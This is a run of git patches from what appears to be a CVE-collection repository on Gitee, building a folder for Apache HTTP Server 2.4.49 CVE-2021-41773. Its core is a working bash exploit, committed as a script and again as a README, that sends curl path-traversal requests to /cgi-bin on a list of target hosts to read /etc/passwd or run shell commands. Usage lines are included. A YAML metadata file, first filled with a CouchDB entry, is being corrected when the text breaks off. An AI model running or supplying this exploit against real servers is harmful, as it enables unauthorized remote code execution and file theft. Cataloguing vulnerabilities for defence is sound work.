From 4213602c4235c25e5544243bbca7966c0992f7bc Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:15:01 +0000 Subject: [PATCH 01/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 38a12e3f8c8f2abe6cbde87eeefe9cce5a30cd51 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:16:12 +0000 Subject: [PATCH 02/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 9e96389deecd9afbbaa0fccf68999540a4e00549 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:16:30 +0000 Subject: [PATCH 03/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 93b3d1389d339201dc6fa4fd85c09c816adade57 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:29:04 +0000 Subject: [PATCH 04/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6f4187bc305d4417e1019018ed2fc79427d7816a Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:29:56 +0000 Subject: [PATCH 05/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/.keep diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ea6c8e0de35a545b12b387e5c575cb325d37d044 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:06 +0000 Subject: [PATCH 06/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2ae05ea337a87b5ea52b4b3acd04882bab8989dd Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:13 +0000 Subject: [PATCH 07/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 435232ab39ea7a2083ffdcdb0a1ab9923f646437 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:44 +0000 Subject: [PATCH 08/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/yaml/.keep diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From afc9907669e68e28463c514d67cf54c04ada7fec Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:58 +0000 Subject: [PATCH 09/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/.keep diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 4e9c383a414dbcdd3e79619a20a2e477a8908bae Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:31:09 +0000 Subject: [PATCH 10/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From cd532a6f0aaff97b77241eb8ed3dae27f2642f06 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:26:56 +0000 Subject: [PATCH 11/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-42013/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 3fcc712be0c8f4454bcdfd3408402617478f97a7 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:34:15 +0000 Subject: [PATCH 12/54] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-41773?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3f2c2f39c9cd387af1944663a58b9d98b93a979c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:35:48 +0000 Subject: [PATCH 13/54] poc Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/CVE-2021-41773.sh | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh new file mode 100644 index 00000000..2546e270 --- /dev/null +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh @@ -0,0 +1,22 @@ +# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Date: 10/05/2021 +# Exploit Author: Lucas Souza https://lsass.io +# Vendor Homepage: https://apache.org/ +# Version: 2.4.49 +# Tested on: 2.4.49 +# CVE : CVE-2021-41773 +# Credits: Ash Daulton and the cPanel Security Team + +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done + +# PoC.sh targets.txt /etc/passwd +# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file -- Gitee From fe88a3d57229cc98a8333aa73376bf2ce569bf56 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:35:55 +0000 Subject: [PATCH 14/54] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-41773/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f2e5ac77cef8389ee1e99d8297f7b4b78ec39488 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:38:18 +0000 Subject: [PATCH 15/54] add cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md new file mode 100644 index 00000000..2546e270 --- /dev/null +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -0,0 +1,22 @@ +# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Date: 10/05/2021 +# Exploit Author: Lucas Souza https://lsass.io +# Vendor Homepage: https://apache.org/ +# Version: 2.4.49 +# Tested on: 2.4.49 +# CVE : CVE-2021-41773 +# Credits: Ash Daulton and the cPanel Security Team + +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done + +# PoC.sh targets.txt /etc/passwd +# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file -- Gitee From 2688f7daaa0e7847d2430e01e3ece5bb9cdc50fd Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:39:49 +0000 Subject: [PATCH 16/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 2546e270..982a529a 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,11 +1,11 @@ -# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -# Date: 10/05/2021 -# Exploit Author: Lucas Souza https://lsass.io -# Vendor Homepage: https://apache.org/ -# Version: 2.4.49 -# Tested on: 2.4.49 -# CVE : CVE-2021-41773 -# Credits: Ash Daulton and the cPanel Security Team +Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Date: 10/05/2021 +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2021-41773 +Credits: Ash Daulton and the cPanel Security Team #!/bin/bash -- Gitee From 1dba8a2213f149666fe292d079ccd0798b67ac7c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:40:35 +0000 Subject: [PATCH 17/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 27 ++++++++++++++++++- 1 file changed, 26 insertions(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 982a529a..0deb5b5f 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -19,4 +19,29 @@ echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done # PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file +# PoC.sh targets.txt /bin/sh whoami +Date: 2022-01-21 + +Exploit Author: Konstantin Burov, @_sadshade + +Software Link: https://couchdb.apache.org/ + +Version: 3.2.1 and below + +Tested on: Kali 2021.2 + +Based on 1F98D's Erlang Cookie - Remote Code Execution + +Shodan: port:4369 "name couchdb at" + +CVE: CVE-2022-24706 + +References: + +https://habr.com/ru/post/661195/ + +https://www.exploit-db.com/exploits/49418 + +https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ + +https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file -- Gitee From 88593c465903ceb74accaf90aceaf3923b4fbdf1 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:41:16 +0000 Subject: [PATCH 18/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 29 ++----------------- 1 file changed, 3 insertions(+), 26 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 0deb5b5f..20e956c4 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -17,31 +17,8 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +#Usage +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami -# PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami -Date: 2022-01-21 -Exploit Author: Konstantin Burov, @_sadshade - -Software Link: https://couchdb.apache.org/ - -Version: 3.2.1 and below - -Tested on: Kali 2021.2 - -Based on 1F98D's Erlang Cookie - Remote Code Execution - -Shodan: port:4369 "name couchdb at" - -CVE: CVE-2022-24706 - -References: - -https://habr.com/ru/post/661195/ - -https://www.exploit-db.com/exploits/49418 - -https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ - -https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file -- Gitee From 4e36553d895c87fc7925380c3a29c3fce9ac8570 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:43:22 +0000 Subject: [PATCH 19/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 20e956c4..40f62d2a 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,3 +1,4 @@ +#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Date: 10/05/2021 Exploit Author: Lucas Souza https://lsass.io -- Gitee From 9576c0b5b9f20ac30897af7d072c684b19d357d3 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:44:34 +0000 Subject: [PATCH 20/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 40f62d2a..76e6e842 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,12 +1,12 @@ -#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Date: 10/05/2021 -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2021-41773 -Credits: Ash Daulton and the cPanel Security Team +#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Date: 10/05/2021 +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2021-41773 +Credits: Ash Daulton and the cPanel Security Team #!/bin/bash -- Gitee From 69b37a7afa77aaa8a228182447709bc94159552d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:45:17 +0000 Subject: [PATCH 21/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 76e6e842..a66265ee 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,4 +1,4 @@ -#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Date: 10/05/2021 Exploit Author: Lucas Souza https://lsass.io -- Gitee From aae94fd447055ac924d313724da6a93a5ee46642 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:47:10 +0000 Subject: [PATCH 22/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index a66265ee..f3ec5ea1 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -7,7 +7,7 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2021-41773 Credits: Ash Daulton and the cPanel Security Team - +`` #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then @@ -18,6 +18,7 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +`` #Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 2ee7f970e46a45ec383b173ffa489e4c63bf7d70 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:47:31 +0000 Subject: [PATCH 23/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index f3ec5ea1..b4f2d065 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -19,7 +19,7 @@ for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done `` -#Usage +# Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 842efb59a95b833e389d0a85f5ccadabe175ab94 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:48:49 +0000 Subject: [PATCH 24/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index b4f2d065..a60daadb 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -7,7 +7,7 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2021-41773 Credits: Ash Daulton and the cPanel Security Team -`` +``` #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then @@ -18,7 +18,7 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done -`` +``` # Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 5cd7861bf43b7ad30133f10e64dbe0f76affcd93 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:49:51 +0000 Subject: [PATCH 25/54] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index a60daadb..d4d61313 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -20,7 +20,8 @@ echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done ``` # Usage -PoC.sh targets.txt /etc/passwd -PoC.sh targets.txt /bin/sh whoami - +``` +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami +``` -- Gitee From 10b19121b5b8a09237a43aedc03f8be872cdb6ac Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:52:38 +0000 Subject: [PATCH 26/54] add cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- .../2021/yaml/CVE-2021-41773.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml new file mode 100644 index 00000000..50fd5093 --- /dev/null +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-24706 +source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit +info: + name: Apache CouchDB 是一个面向文档的数据库管理系统。 + severity: critical + description: + 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。 + scope-of-influence: + apache-CouchDB < 3.2.2 + reference: + - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... + - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... + - http://www.openwall.com/lists/oss-security/2022/04/26/1 + - http://www.openwall.com/lists/oss-security/2022/05/09/1 + - http://www.openwall.com/lists/oss-security/2022/05/09/2 + - http://www.openwall.com/lists/oss-security/2022/05/09/3 + - http://www.openwall.com/lists/oss-security/2022/05/09/4 + - https://docs.couchdb.org/en/3.2.2/setup/cluster.html + - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 + - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... + - https://www.openwall.com/lists/oss-security/2022/04/26/1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24706 + cwe-id: CWE-1188 + cnvd-id: None + kve-id: None + tags: + - 不安全的默认资源初始化 + - 弱口令要求 + - 远程代码执行 \ No newline at end of file -- Gitee From 0224658f029cfceb7331377e7549cf89975adec2 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:56:12 +0000 Subject: [PATCH 27/54] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml index 50fd5093..66d2294f 100644 --- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -1,10 +1,10 @@ -id: CVE-2022-24706 -source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit +id: CVE-2021-41773 +source: https://www.exploit-db.com/exploits/50383 info: - name: Apache CouchDB 是一个面向文档的数据库管理系统。 + name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。 severity: critical description: - 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 